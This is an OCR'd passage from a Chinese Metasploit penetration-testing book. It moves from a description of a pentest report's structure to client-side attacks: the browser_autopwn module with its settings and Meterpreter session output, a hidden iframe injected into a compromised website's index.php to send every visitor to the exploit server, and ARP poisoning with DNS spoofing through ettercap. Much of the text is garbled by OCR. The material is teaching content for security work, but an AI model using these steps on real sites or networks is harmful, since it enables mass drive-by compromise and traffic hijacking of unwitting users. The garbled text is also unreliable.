一 份 合格 的 渗透 报告 可 以 按照 以 下 格式 进行 细 分 。 
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a 页 面 设计 
口 文档 控制 

m 封面 

a 文档 属性 


口 报告 内 容 列 表 


m 目录 
u 插图 列表 
口 执行 摘要 
mu 渗透 测试 适用 范围 
m 严重 性 信息 
m 目标 
m 假设 
m 漏洞 信息 摘要 
m 漏洞 分 布 图 
m 建议 摘要 
口 方法 /技术 报告 
m 测试 细节 
m 漏洞 名 单 
m 可 能; 
m 建议 


口 参考 文献 
口 词汇 表 
口 附录 


下 面 是 对 一 些 重要 步骤 的 简要 说 明 。 


a 页 面 设计 : 页 面 设 计 是 指 报告 中 使 用 的 字体 、 标 题 和 页 脚 、 颜 色 等 。 

a 文档 控制 : 这 部 分 包括 了 有 关 报 告 的 常规 属性 。 

O 封面 : 这 部 分 包括 报告 的 名 称 、 版 本 、 时 间 和 日 期 、 目 标 组 织 和 序列 号 等 。 
口 文档 属性 : 这 部 分 包括 了 报告 的 标题 、 测 试 者 的 姓名 和 报告 审查 者 的 姓名 。 
O 报告 内 容 列 表 : 这 部 分 包括 了 报告 的 各 部 分 内 容 以 及 它们 的 详细 页 码 。 

口 目录 : 这 部 分 包含 了 从 报告 开始 到 结束 的 所 有 内 容 的 组 织 结构 。 

口 插图 清单 : 报告 中 使 用 的 所 有 插图 及 其 页 码 都 在 这 里 出 现 。 
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2. 执行 摘要 
执行 摘要 是 对 完整 报告 的 总 结 , 它 要 以 不 包含 专业 术语 的 一 般 语 言 进行 叙述 , 侧重 于 向 高 级 
管理 人 员 提 供 信 息 ， 通 常 包 含 以 下 信息 。 


a 渗透 测试 适用 范围 : 这 一 节 包 括 测试 的 类 型 以 及 测试 的 系统 信息 。 一般 来 说 , 要 测试 的 

全 部 IP 范 围 都 应 在 这 一 节 中 列 出 。 此 外 ， 该 部 分 还 应 包括 有 关 测 试 严重 性 的 信息 。 

O 目标 : 这 一 节 将 曾 述 该 测试 如 何 能 够 帮助 目标 组 织 改 进 ， 以 及 该 测试 带 来 的 益处 等 。 

a 假设 : 在 测试 阶段 中 做 出 的 任何 假设 都 应 该 在 这 里 列 出 。 假 设 我 们 在 被 测试 网 站 的 管理 
面板 中 发 现 了 一 个 XSS 漏 洞 。 如 果 想 引发 这 个 漏洞 ,我 们 需要 使 用 管理 员 权 限 登 录 。 在 这 
种 情况 下 ， 我 们 所 提出 的 假设 就 是 ， 需 要 管理 员 权限 来 执行 这 种 攻击 。 

口 漏洞 信息 摘要 : 这 部 分 以 表格 的 形式 描述 发 现 的 漏洞 数量 ， 将 按照 它们 的 危险 等 级 分 为 

高 、 中 、 低 三 个 级 别 ， 危 险 等 级 越 高 ， 造 成 的 破坏 越 大 。 这 个 阶段 含有 一 个 漏洞 分 布 图 

表 ， 这 个 表 包 括 了 多 个 系统 的 所 有 问题 信息 。 下 表 就 是 这 样 的 一 个 示例 。 


危险 等 级 漏洞 数量 
高 19 
中 15 
低 10 


口 建议 摘要 : 这 部 分 列举 出 来 的 建议 仅 是 针对 那些 影响 最 大 的 漏洞 。 
3. 管理 员 级 别 的 报告 


报告 的 这 一 部 分 包括 了 渗透 测试 期 间 执行 的 所 有 步骤 、 漏 洞 的 深入 细节 以 及 修改 建议 。 一 般 
来 说 ， 管 理 员 对 下 面 列 出 的 内 容 更 感 兴趣 。 


Q 测试 细节 : 报告 的 这 部 分 将 测试 过 程 中 的 安全 漏洞 、 风 险 因 素 以 及 被 这 些 漏 洞 感染 的 系 

统 的 相关 数据 以 图 、 图 表 和 表格 的 形式 进行 了 汇总 。 

口 漏洞 名 单 : 该 报告 的 这 部 分 包括 漏洞 的 细节 、 位 置 ， 以 及 产生 该 漏洞 的 主要 原因 。 

口 可 能 性 : 这 一 部 分 解释 了 这 些 漏洞 被 攻击 者 利用 的 可 能 性 。 这 是 通过 分 析 触 发 特定 漏洞 

的 难 易 度 以 及 成 功 渗透 目标 漏洞 的 最 简单 方法 和 最 困难 方法 得 到 的 。 

口 建议 : 这 一 节 中 给 出 了 漏洞 的 修复 方案 。 如 果 一 个 渗透 测试 不 能 给 出 漏洞 的 修复 方案 ， 
则 被 认为 是 一 份 只 完成 了 一 半 的 工作 。 

4. 附加 部 分 

口 参考 文献 : 列举 出 这 份 报告 中 所 出 现 的 所 有 引用 。 引 用 的 来 源 包括 图 书 、 网 页 和 文章 等 。 

这 些 引 用 要 清楚 地 说 明 作者 姓名 、 出 版 物 名 称 和 出 版 年 份 日 期 等 。 

口 词汇 表 : 这 份 报告 中 出 现 的 技术 术语 以 及 它们 的 含义 都 出 现在 这 个 部 分 。 

O 附录 : 如 果 报 告 中 要 使 用 一 些 脚本 、 代 码 和 图 片 ， 那 么 可 以 将 它们 放 在 附录 中 。 
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6.2 ”小结 


在 本 章 中 ， 我 们 学 会 了 如 何 对 指定 范围 内 的 目标 进行 有 效 的 灰 盒 测试 ， 如 何在 Metasploit 命 
令 行 中 直接 运行 一 些 目前 业内 领先 的 工具 ， 以 及 Metasploit 如 何在 一 次 完整 的 渗透 测试 中 发 挥 它 
的 作用 。 另 外 我 们 还 学 习 了 如 何 生成 报告 ， 以 及 如 何 使 用 Faraday 来 管理 整个 渗透 测试 。 


在 下 一 章 中 ， 我 们 将 会 学 习 如 何 使 用 Metasploit 完 成 客户 端 攻 击 ， 以 及 如 何 使 用 社会 工程 学 
和 攻击 载荷 交付 获取 那些 无 法 直接 渗透 的 系统 控制 权限 。 


客户 端 渗透 


“我 善于 识 人 的 诀窍 就 在 于 找到 人 们 最 脆弱 的 一 面 。” 


Mr. Robot 


在 前 面 的 章节 中 ， 我 们 讨论 了 代码 编写 和 不 同 环境 下 的 渗透 测试 。 而 在 本 章 及 后 续 章节 中 ， 
我 们 将 详细 介绍 客户 端 渗 透 。 


本 章 将 着 眼 于 以 下 几 个 要 点 。 


口 对 目标 浏览 器 进行 攻击 。 
口 用 来 欺骗 用 户 的 复杂 攻击 问 量 。 
口 使 用 恶意 软件 包 攻击 Linux。 
口 攻击 Android 和 Linux 系 统 。 
a 使 用 Arduino 进 行 渗透 。 
口 将 攻击 载荷 模块 注入 到 各 种 文件 。 

基于 客户 端的 渗透 攻击 需要 得 到 目标 用 户 的 配合 才能 成 功 。 这 些 配合 包括 访问 恶意 网 址 、 打 
开 或 执行 一 个 文件 , 等 等 ,这 意味 着 我 们 需要 得 到 被 害 者 的 配合 才能 成 功 地 渗透 进入 他 们 的 系统 。 
因此 ,被 害 者 的 配合 是 基于 客户 端的 渗透 攻击 的 一 个 关键 因素 。 

客户 端 系统 可 能 运行 着 多 种 不 同 的 应 用 程序 。 这 些 应 用 程序 ( 比如 PDF 阅读 器 、 文 字 处 理 软 
件 、 媒 体 播 放 器 以 及 各 种 类 型 的 Web 浏 览 器 ) 都 是 系统 中 的 基本 软件 。 本 章 将 发 掘 各 种 应 用 程序 
的 缺陷 , 这 些 缺 陷 可 能 导致 整个 系统 被 渗透 。 我 们 还 可 以 将 被 渗透 的 系统 作为 跳板 来 测试 整个 内 
部 网 络 。 


首先 ， 介绍 一 下 客户 端 渗 透 攻 击 的 多 种 技术 和 影响 客户 端 渗透 能 否 成 功 的 因素 。 


7.1 有 趣 又 有 料 的 浏览 器 渗透 攻击 


Web 浏 览 器 主要 用 于 网 上 冲浪 。 然 而 ， 一 个 过 时 的 Web 浏 览 器 却 可 能 导致 整个 系统 被 渗透 。 
用 户 通 常 不 会 使 用 系统 预 装 的 Web 浏 览 器 ， 而 是 会 按照 自己 的 喜好 来 自行 选择 。 但 是 ， 默 认 的 预 
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装 Web 浏 览 需 仍然 可 能 导致 系统 遭受 各 种 攻击 。 基 于 浏览 需 的 渗透 攻击 就 是 要 利用 浏览 器 的 漏洞 
进行 渗透 。 
有 关 基 于 Firefox 的 漏洞 的 信息 ， 请 访问 http://www.cvedetails.com/product/3264/ 


i) Mozilla-Firefox.html?wendor-id=26。 
有 关 基 于 下 的 漏洞 的 信息 , 请 访问 http://www.cvedetails.com/product/9900/Microsoft- 


Internet-Explorer.html?vendor id=20。 


7.1.1 browser autopwn 攻击 


Metasploit 中 提供 了 一 个 browser autopwn 模 块 , 这 是 一 个 可 以 用 来 对 各 种 浏览 器 进行 测试 和 
渗透 的 自动 化 攻击 向 量 。 如 果 想 要 细致 地 了 解 这 个 模块 的 工作 原理 , 我 们 先 来 讨论 一 下 这 次 攻击 


中 使 用 的 技术 原理 。 
1. browser autopwn 攻 击 的 原理 


autopwn 指 的 是 自动 对 目标 进行 渗透 。autopwn 模 块 在 配置 了 所 有 要 使 用 的 浏览 器 渗透 脚本 
后 ， 将 处 于 监听 模式 下 。 然 后 ， 它 便 等 待 着 一 个 即将 到 来 的 连接 。 一 旦 连接 建立 ， 它 就 会 发 送 一 
系列 与 目标 浏览 器 相 匹 配 的 渗透 模块 ,具体 发 送 哪个 模块 要 取决 于 受害 者 的 浏览 器 类 型 。 无 论 目 
标 系 统 上 运行 着 什么 浏览 器 ， 只 要 存在 漏洞 ，autopwn 模 块 就 能 自动 发 起 攻击 。 


通过 下 面 的 图 来 了 解 一 下 这 个 攻击 向 量 的 工作 原理 。 


服务 器 上 的 渗透 模块 


受害 者 和 渗透 服务 器 建立 连接 
(浏览 一 个 恶意 链接 ) 


基于 IE 浏 览 器 


TARS 
月 浏览 器 

为 EE， 向 受害 者 的 系 A. 
统 发 送 了 对 应 的 渗透 
模块 


在 目标 上 执行 渗透 模块 ， 并 
向 攻击 者 提供 Meterpreter 控 制 
权限 


渗透 用 的 handler 


AE 
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在 前 面 的 这 个 场景 中 , 一 个 用 来 渗透 的 服务 右上 运行 


大 量 的 基于 浏览 需 的 渗透 模块 ,同时 


也 运行 着 它们 所 对 应 的 handler。 现 在 一 旦 有 受害 者 的 浏览 融 连 接 到 了 渗透 服务 部 上 ,该 服务 天 将 
会 检查 浏览 需 的 类 型 并 找 出 对 应 该 浏览 器 的 渗透 模块 。 在 上 面 的 图 中 , 可 以 看 到 受害 者 使 用 的 是 
IE， 因此 与 EB 相 匹配 的 渗透 模块 将 会 被 发 送 到 受害 者 的 浏览 融 中 以 获得 目标 的 控制 权 。 渗透 模块 


成 功 执行 后 将 会 返回 一 个 到 handler 的 连接 ,攻击 者 将 会 获得 目标 的 shell 或 者 Meterpreter 控 制 权 限 。 


2. 使 用 Metasploit 的 browser autopwn 模 块 进行 浏览 器 攻击 


使 用 Metasploit 中 的 browser_autopwn 模 块 进行 一 次 针对 浏览 器 的 渗透 攻击 ， 过 程 如 下 图 所 示 。 


msf > use auxiliary/server/browser autopwn 
msf auxiliary(browser autopwn) > show options 


Module options (auxiliary/server/browser autopwn): 


SRVPORT 8080 yes 

SSL false no 
nnections 

SSLCert no 
ate (default is randomly generated) 

URIPATH no 


it (default is random) 


Auxiliary action: 
Name Description 


iate exploits 


Name Current Setting Required Description 
LHOST yes 

erse-connect payloads 
SRVHOST 0.0.0.0 yes 


This must be an address on the local machine or 0.0.0.0 


WebServer Start a bunch of modules and direct clients to appropr| 


The IP address to use for rev| 


The local host to listen on. 


The local port to 
Negotiate SSL for 


listen on. 
incoming co| 


Path to a custom SSL certific| 


The URI to use for this explo| 


由 上 图 可 知 ， 我们 已 经 成 功 地 在 Metasploit 中 载 人 了 auxiliary/server/ 中 的 browser_autpown 
模块 。 为 了 发 起 这 次 攻击 ， 需 要 指定 LHOST、URIPATH 和 SRVPORT 参 数 。SRVPORT 参 数 指定 了 渗 
透 服 务 器 使 用 的 端口 。 我 建议 使 用 端口 80 或 者 端口 443 ， 因 为 使 用 其 他 端口 可 能 会 引起 别人 的 注 


/， 表 示 根 目录 。 在 设 定 好 所 有 所 需 的 参数 之 后 ， 


it 有 些 不 正常 。URIPATH 是 存储 各 种 渗透 模块 的 目录 路 径 , 它 的 值 应 该 被 指定 为 


就 可 以 如 下 


图 所 示 启 动 模块 。 


msf auxiliary (browser autopwn) 
LHOST => 192.168.10.105 

msf auxiliary (browser autopwn) 
URIPATH => / 

msf auxiliary (browser autopwn) 
SRVPORT => 80 

msf auxiliary(browser autopwn) 
[*] Auxiliary module execution 


[*] Setup 


[*] 一 一 一 


[*] Starting exploit modules on host 192.168.10.105... 


> set LHOST 192.168.10.105 
» set URIPATH / 
> set SRVPORT 80 


> exploit 
completed 
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启动 prowser autopvwn 模 块 之 后 就 会 建立 一 个 浏览 央 渗 透 服务 器 ， 开始 监听 状态 ， 等 
待 到 来 的 连接 ， 过 程 如 下 图 所 示 。 


] Using URL: http://0.0.0.0:80/daKfwjZ 

Local IP: http://192.168.10.105:80/daKfwjZ 

Server started. 

Starting handler for windows/meterpreter/reverse tcp on port 3333 
Starting handler for generic/shell reverse tcp on port 6666 
Started reverse TCP handler on 192.168.10.105:3333 

Starting the payload handler... 

Starting handler for java/meterpreter/reverse tcp on port 7777 
Started reverse TCP handler on 192.168.10.105:6666 

Starting the payload handler... 

Started reverse TCP handler on 192.168.10.105:7777 

Starting the payload handler... 


--- Done, found exploit modules 
Using URL: http://0.0.0.0:80/ 


[*] Local IP: http://192.168.10.105:80/ 
[*] Server started. 


MEM — 7 Ye B1] ] RE R9 803m H E. R9 Hbf 38 8] —- 38 TZ Pr JH B DEA d 818 
透 攻 击 。 下 面 分 析 一 下 受害 者 是 如 何 连 接 到 渗透 服务 器 的 。 


人 Loading - Windows Internet Explorer 


Gs (9 http://192.168.10.105/ ~| EX 


pg Favorites | J3 | Suggested Sites v  && ] Web Slice Gallery v 


e Loading | | A hf 


当 有 受害 者 访问 我 们 的 IP 地 址 时 ，browser _ autopwn 模 块 就 会 向 其 发 送 各 种 漏洞 模块 ， 直 
到 获得 Meterpreter 控 制 权限 为 止 ， 如 下 图 所 示 。 
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[*] Sending stage (957487 bytes) to 192.168.10.111 
[*] Meterpreter session 1 opened (192.168.10.105:3333 -» 192.168. 
10.111:51608) at 2016-06-30 11:48:29 +0530 
[*] Session ID 1 (192.168.10.105:3333 -» 192.168.10.111:51608) pr 
ocessing InitialAutoRunScript 'migrate -f' 
[*] Current server process: iexplore.exe (3728) 
[*] Spawning notepad.exe process to migrate to 
Migrating to 3700 
Successfully migrated to process 


msf auxiliary(browser autopwn) » sessions -i 


Active sessions 


Id Type Information 


1 meterpreter x86/win32 WIN-97G4SSDJD5SMApex @ WIN-97G4SSDJD 
5S 192.168.10.105:3333 -> 192.168.10.111:51608 (192.168.10.111) _ 


msf auxiliary(browser autopwn) > 目 
browser autopwn 模 块 允许 我 们 使 用 各 种 漏洞 检测 模块 对 受害 者 的 浏览 器 进行 测试 和 渗透 。 
不 过 这 种 客户 端 渗透 可 能 会 引起 服务 中 断 ， 因 此 最 好 事先 获得 客户 的 许可 。 在 下 一 节 中 ,我 们 将 
看 到 一 个 模块 ( 比如 browser autopwn ) 是 如 何 对 多 个 目标 进行 渗透 的 。 


7.1.2 ”对 网 站 的 客户 进行 渗透 
在 这 一 节 中 ， 我 们 来 尝试 将 这 次 普通 的 攻击 转化 为 威胁 性 更 大 的 攻击 。 


正如 上 一 节 演 示 的 一 样 , 向 目标 发 送 一 个 IP 地 址 可 能 会 引起 注意 , 受害 者 可 能 会 对 你 发 送 的 
IP 地 址 产生 怀疑 。 不 过 如 果 你 用 域名 地 址 取代 IP 地 址 发 送 给 受害 者 ， 就 会 有 更 大 的 几率 蒙骗 受害 
者 ， 从 而 提高 渗透 的 成 功率 。 


1. 注入 恶意 网 页 脚本 


一 个 有 漏洞 的 网 站 可 以 成 为 browser autopwn 服 务 器 的 倪 偶 。 攻击 者 如 果 在 有 漏洞 的 网 站 中 藤 
人 隐藏 的 iFrame， 那 么 访问 这 个 网 站 的 所 有 系统 都 会 遭受 来 自 browser autopwn 服 务 器 的 攻击 。 因 
Jb, 每 当 有 人 访问 这 个 被 注入 的 页 面 时 ，browser autopwn 活 透 服务 器 就 会 对 浏览 器 进行 各 种 漏洞 
的 测试 。 在 大 多 数 情况 下 ， 还 会 利用 找到 的 漏洞 进行 渗透 。 


我 们 可 以 使 用 iFrame 注 入 实现 对 网 站 用 户 的 大 规模 入 侵 。 下 一 节 将 会 讲解 攻击 的 具体 细节 。 
2. 攻击 网 站 的 用 户 
下 图 讲解 了 如 何 实 现 对 网 站 用 户 的 入 侵 。 
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攻击 者 将 iFrame 注 入 受害 者 访问 被 利用 的 服务 
到 被 利用 的 服务 器 中 ， 器 后 ， 其 浏 Wurde E 
iFrame 的 地 址 就 指向 (攻击 者 获得 了 她 系统 的 
browser autopwn 服 务 器 ”控制 权限 ) 


1 攻击 者 建立 一 个 


browser autopwnjlit 4$ 2 


E» 


browser autopwn 服 务 器 被 利用 的 服务 器 


上 图 非常 清楚 地 说 明了 这 个 过 程 , 现在 te 4 体 的 实现 过 程 。 这 次 攻击 最 重要 的 步骤 就 是 
获取 一 个 存在 漏洞 的 服务 右 的 控制 权限 。 下 图 给 出 了 一 个 关于 恶意 脚本 注入 的 详细 示例 。 


>: 2016-07-05 09:08:55 


这 里 使 用 一 个 存在 漏洞 RO Web ISI WEZR A; 我 们 可 以 利用 这 个 漏洞 向 网 站 上 传 一 个 基于 第 
三 方 Web 命 令 行 的 PHP 文 件 。 为 了 执行 这 次 攻击 ， 需 要 在 index.php 或 者 选中 的 其 他 页 面 中 添加 如 
下 代码 : 


«iframe src="http://192.168.10.107:80/" width=0 height=0 style-"hidden" 
frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> 


190 第 7 章 复杂 的 客户 端 


党 攻击 


每 当 有 受害 者 访问 网 站 时 ， 上 面 的 代码 就 会 自动 加 载 下 rame 中 的 恶意 browser autopwn。 由 于 


这 段 代码 包含 了 一 个 i1frame 标 签 ， 它 将 从 攻击 者 的 系统 中 自动 加 载 browser autopwn。 我 们 需要 
保存 这 个 文件 ， 并 允许 用 户 对 网 站 进行 访问 。 


受害 者 一 旦 访问 了 这 个 网 页 ，browser autopwn 将 会 自动 在 受害 者 的 计算 机 上 运行 。 我 们 必须 确保 
browser autopwn 模 块 正 常 运行 ;如 果 browser autopwn 模 块 没有 运行 ， 可 以 使 用 如 下 命令 来 启动 它 。 


Imsf auxiliary(browser autopwn) > set LHOST 192.168.10.107 
LHOST => 192.168.10.107 

msf auxiliary(browser autopwn) > set SRVPORT 80 

SRVPORT -» 80 

msf auxiliary(browser autopwn) > set URIPATH / 

URIPATH => / 

msf auxiliary(browser autopwn) > exploit 

[*] Auxiliary module execution completed 


[*] Setup 


[*] 
[*] - 


St arting exploit modules on host 192.168.10.107... 


如 果 一 切 顺 利 ， 我 们 将 会 获得 在 目标 系统 上 运行 的 Meterpreter。 这 种 渗透 思路 是 使 用 目标 网 
站 引诱 最 大 数量 的 受害 者 ， 并 进入 到 他 们 的 系统 中 。 在 进行 白 盒 测试 时 ,这 种 方法 非常 有 用 ， 渗 
透 的 目标 就 是 内 部 网 络 服务 器 的 用 户 。 让 我 们 来 看 看 当 受 害 者 浏览 恶意 网 站 时 会 发 生 什么 


example-demo.com 


可 以 看 到 ， 这 里 的 调用 是 


autopwn 服 务 右 。 让 我 们 从 攻击 者 的 角度 来 看 看 这 个 过 程 。 


192.168.10.107 发 起 的 ， 这 个 下地 址 其 实 就 是 我 们 的 browser 


[*] 192.168.10.105 
[*] 192.168.10.105 
iIcMSA.jar 

[*] 192.168.10.105 
[*] 192.168.10.105 


ay Type Violation Vulnerability 


[*] 192.168.10.105 

es). 

[*] 192.168.10.105 

r1 192.168.10.105 
[*] 192.168.10.105 


code Verifier Cache Remote Code Execution 


[*] 192.168.10.105 


java_verifier_field_access - Sending jar 
java jrel7 reflection types - handling request for /uEHZ/ow 


java rhino - Sending Applet. jar 
java atomicreferencearray - Sending Java AtomicReferenceArr 


java atomicreferencearray - Generated jar to drop (5125 byt 
java jrel7 reflection types - handling request for /uEHZ/ 
java jrel7 jmxbean - handling request for /NcXYqzyENHt/ 
java verifier field access - Sending Java Applet Field Byte 


java verifier field access - Generated jar to drop (5125 by! 


整个 渗透 过 程 正在 顺利 地 进行 。 当 渗透 成 功 之 后 , Meterpreter 访 问 权 限 就 会 显示 在 我 们 面前 。 
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7.1.3 与 DNS 欺骗 的 结合 使 用 


我 们 希望 将 对 受害 者 系统 的 所 有 攻击 被 发 现 的 几率 降 到 最 小 ， 并 尽 可 能 不 引起 受害 者 的 


现在 我 们 已 经 看 到 了 一 个 传统 的 browser autopwn 攻 击 以 及 改进 后 针对 网 站 用 户 的 攻击 。 这 里 
我 们 受到 了 一 个 约束 ， 那 就 是 必须 要 通过 某 种 方式 将 陷阱 链接 发 送 给 受害 者 。 


在 这 次 攻击 中 ， 我 们 仍然 使 用 Metasploit 中 的 browser autopwn 模 块 来 攻击 受害 者 ， 但 是 使 用 
另 一 种 方式 一 一 不 再 向 受害 者 发 送 任何 链接 ， 而 是 等 竺 他们 去 浏览 自己 喜欢 的 网 站 。 


这 种 攻击 只 能 在 局 域 网 环境 中 使 用 。 因 为 若 想 采用 这 种 方式 ， 首先 需 要 执行 ARP 欺 骗 。ARP 
工作 在 协议 层 的 第 二 层 ， 只 在 同一 个 广播 域 下 工作 。 但 如 果 可 以 通过 某 种 方式 来 修改 远程 受害 者 
主机 的 hosts 文 件 ， 我 们 就 可 以 不 用 考虑 这 个 范围 的 限制 ， 这 通常 被 称 为 一 个 域 欺骗 攻击 。 


使 用 DNS 劫持 欺骗 受害 者 


让 我 们 开始 吧 ! 首先 对 受害 者 发 起 一 个 ARP 毒 化 攻击 ， 并 执行 DNS 查询 欺骗。 因此 ， 如 果 受 
害 者 试图 打开 一 个 常用 的 网 站 主页 , 例如 当前 使 用 人 数 最 多 的 http:/google.com, 结果 却 是 打开 了 
我 们 设置 的 browser autopwn 服 务 的 陷阱 主页 ， 进 而 使 得 他 的 系统 遭 到 了 来 自 陷 阱 网 站 的 攻击 。 


我 们 需要 首先 创建 一 个 DNS 毒化 列表 ， 这 样 当 受害 者 输入 一 个 域名 试图 打开 对 应 网 站 的 时 
候 ， 本 来 域名 http://www.google.com 所 指向 的 他 地址 就 会 被 替换 为 陷阱 网 站 的 人 PP 地址。 这 些 伪造 
的 DNS 条 目 保 存在 下 列 文件 里 。 


root@root:~# locate etter.dns 
/usr/local/share/videojak/etter.dns 
/usr/share/ettercap/etter.dns 
在 这 个 例子 中 ， 我 们 使 用 当前 最 为 流行 的 ARP 毒 化 工具 集合 ， 那 就 是 ettercap。 首 先 ， 找 
到 这 个 文件 并 创造 一 个 伪造 的 DNS 列表 。 这 一 点 是 非常 重要 的 ,因为 当 受害 者 在 试图 打开 某 一 个 
指定 网 站 的 时 候 ， 该 域名 本 来 对 应 的 正确 耳 会 被 我 们 修改 的 伪造 下 所 代 蔡 。 为 了 实现 这 一 点 ， 需 
要 修改 etter.dns 文 件 中 的 列表 ， 具 体 过 程 如 下 面 的 屏幕 截图 所 示 。 


root@root:~# nano /usr/share/ettercap/etter.dns 


我 们 需要 在 本 节 中 对 列表 中 的 内 容 做 以 下 修改 。 


google.com A 192.168.65.132À 
microsoft.com A 198.182.196.56 
* microsoft.com A 198.182.196.56 
www.microsoft.com PTR 198.182.196.56 
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当 受 害 者 发 出 一 个 关于 域名 http://google.com 的 DNS 请 求 时 , 这 个 列表 就 会 把 攻击 者 计算 机 的 
IP 地 址 作为 响应 发 送 给 他 。 当 创建 完 列表 之 后 ,保存 这 个 文件 并 且 使 用 命令 的 方式 打开 
ettercap。 这 个 过 程 如 下 图 所 示 。 


[reote root:-£ ettercap -GE 


这 个 命令 将 能 以 图 形 化 界面 的 形式 启动 ettercap， 启 动 的 界面 如 下 图 所 示 。 


下 一 个 步骤 是 选中 Sniff 选 项 卡 中 的 Unifed sniffng... 选 项 ， 然 后 选择 接口 eth0 作 为 默认 接口 ， 
如 下 面 的 屏幕 截图 所 示 。 


接 下 来 要 对 目标 网 络 范围 内 的 卫 地 址 进行 扫描 ， 以 此 来 验证 哪些 主机 处 于 在 线 状态 。 受 害 者 
的 主机 和 网 关 应 该 也 在 这 些 主机 范围 内 ， 如 下 面 的 屏幕 截图 所 示 。 
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所 有 地 址 范围 内 的 主机 , 都 会 被 扫描 并 根据 其 在 线 状 态 进行 过 滤 。 这样 所 有 网 络 中 在 线 的 主 
机 信息 都 会 按照 下 图 所 示 添 加 到 主机 列表 中 。 


我 们 需要 导航 到 Hosts 选 项 卡 ， 然 后 选择 Host List， 这 样 才能 打开 主机 列表 ， 如 下 面 的 屏幕 截 
图 所 示 。 


接 下 来 需要 将 网 关 的 地 址 添加 到 目标 2, 并 将 受害 者 的 地 址 添加 到 目标 1。 我 们 以 后 就 将 网 关 
看 作 目 标 2， 将 受害 者 的 计算 机 看 作 目 标 1。 因 为 我 们 需要 截获 受害 者 发 往 网 关 的 通信 。 


接着 ， 查 看 MITM 选 项 卡 ， 然 后 在 其 中 选择 ARP Poisoning， 如 下 面 的 屏幕 截图 所 示 。 
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接 下 来 ， 单 击 OK 后 继续 下 一 步 ， 即 浏 


Sniffing 选 项 ， 这 时 将 会 输 


览 到 Start 选 项 卡 ， 然 后 选择 Start Sniffing。 单 击 Start 
iga 


Hh — Starting Unifed sniffing 的 提示 信息 


息 ， 如 下 图 所 示 。 


接 下 来 我 们 要 激活 DNS 坎 骗 插件 程序 ， 激 活 的 步骤 是 从 Plugins 选 项 卡 中 选 # 


Manage the 
plugins， 如 下 面 的 屏幕 截图 所 示 。 


双击 DNS spoof plug-ipn 以 激活 DNS 坎 骗 。 这 个 插件 被 激活 之 后 将 会 发 送 伪造 的 DNS 数据 ， 
这 些 数据 是 我 们 之 前 在 文件 etterdns 中 修改 过 的 。 因 此 无 论 何 时 ， 只 要 受害 者 发 送 某 个 特定 网 


站 域名 的 DNS 请 求 ， 攻击 就 会 伪造 一 个 响应 , 使 用 etter DNS 文件 中 假 胃 的 DNS 条 目 来 代替 真实 
的 条 目 。 


这 个 假冒 的 DNS 条 目 指向 设置 了 browser autopwn 服 务 的 主机 的 IP。 因 此 ， 受 


MZ, 二 


韦 者 并 没有 进 
入 自己 原 计 划 的 网 站 ， 而 是 进入 了 运行 着 browser autopwn 服 务 的 那个 陷阱 网 站 。 


接 下 来 在 80 端 口 启 动 陷阱 网 站 。 
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msf > use auxiliary/server/browser_autopwn 

msf auxiliary(browser_autopwn) > set LHOST 192.168.65.132 
LHOST => 192.168.65.132 

msf auxiliary(browser autopwn) > set SRVPORT 80 

SRVPORT => 80 

msf auxiliary(browser autopwn) > set URIPATH / 

URIPATH => / 

msf auxiliary(browser autopwn) > exploitl 


现在 来 看 看 当 受 害 者 试图 打开 http:/google.com/ 时 都 发 生 了 什么 


Zi Loading - Microsoft Internet Explorer 


File Edit View Favorites Tools Help 


Q 8ad o [æ] a A JO search Si Favorites € 2- r^ 党 


dress &] http://google.com] 


同时 也 从 攻击 者 的 角度 看 一 下 是 否 获 取 了 一 些 有 趣 的 东西 。 


e] 192.168.65.129 Reporting: {:os_name=>"Microsoft Windows", :os_flavor 
=>"XP", :os_sp=>"SP2", :os_lang=>"en-us", :arch=>"x86"} 

[*] Responding with exploits 

[*] Sending MS03-020 Internet Explorer Object Type to 192.168.65.129:1054. 


[-] Exception handling request: Connection reset by peer 
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.65.129:1055. 


[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.65 
.129:1056 (target: IE 6 SPO-SP2 (onclick))... 

[*] Sending stage (752128 bytes) to 192.168.65.129 

[*] Meterpreter session 1 opened (192.168.65.132:3333 -» 192.168.65.129:10 
58) at 2013-11-07 12:08:48 -0500 

[*] Session ID 1 (192.168.65.132:3333 -» 192.168.65.129:1058) processing I 
nitialAutoRunScript 'migrate -f' 

[*] Current server process: iexplore.exe (3216) 

[*] Spawning a notepad.exe host process... 

[*] Migrating into process ID 3300 

Imsf auxiliary(browser autopwn) > [*] New server process: notepad.exe (3300) 


看 起 来 不 错 吧 ! 我 们 得 到 了 在 目标 后 台 打 开 的 Meterpreter 连 接 ， 这 意味 着 成 功 获 取 了 受 


害 者 


的 管理 权限 。 但 是 在 整个 过 程 中 , 我 们 并 没有 向 受害 者 发 送 任 何 链接 ， ee 
大 优势 ， 因 为 我 们 毒化 了 本 地 网 络 的 DNS 条 目 。 然 而 ， 如 果 想 在 一 个 广域网 中 实现 这 种 攻击 ， 就 


需要 修改 受害 者 的 主机 文件 。 这 样 当 受害 者 试图 访问 一 条 指定 的 URL 时 , 算 改 过 的 主机 文件 条 目 


将 会 将 这 个 URL 定 向 到 那个 恶意 autopwn 服 务 器 上 。 这 个 过 程 如 下 面 的 屏幕 截图 所 示 。 


msf  auxiliary(browser autopwn) > sessions -i 


Active sessions 


Id Type Information 


1 meterpreter x86/win32  NIPUN-DEBBE6F84NAdministrator @ NIPUN-DEBBE6F84 
192.168.65.132:3333 -» 192.168.65.129:1058 


msf  auxiliary(browser autopwn) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > sysinfo 


Computer : NIPUN-DEBBE6F84 

os : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 

System Language : en US 

Meterpreter : x86/win32 


meterpreter > M 


还 有 许多 其 他 技术 可 以 与 Metasploit 的 攻击 技术 结合 使 用 ， 从 而 创造 出 更 高 级 的 攻击 手段 。 
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7.2 Metasploit 和 Arduino 一 一 致命 搭档 


基于 Arduino 的 微 控 制 器 板 是 一 款 体积 很 小 但 功能 极为 强大 的 硬件 ， 它 可 以 成 为 渗透 测试 中 
的 一 款 致命 武器 。 有 一 些 Arduino 板 还 支持 键盘 和 鼠标 库 ， 这 意味 着 它们 可 以 成 为 HID 设 备 。 


因此 这 些 体积 很 小 的 Arduino 板 就 可 以 悄悄 地 执行 人 类 行为 ， 例 如 敲 击 键盘 、 移 动 和 点 击 鼠 
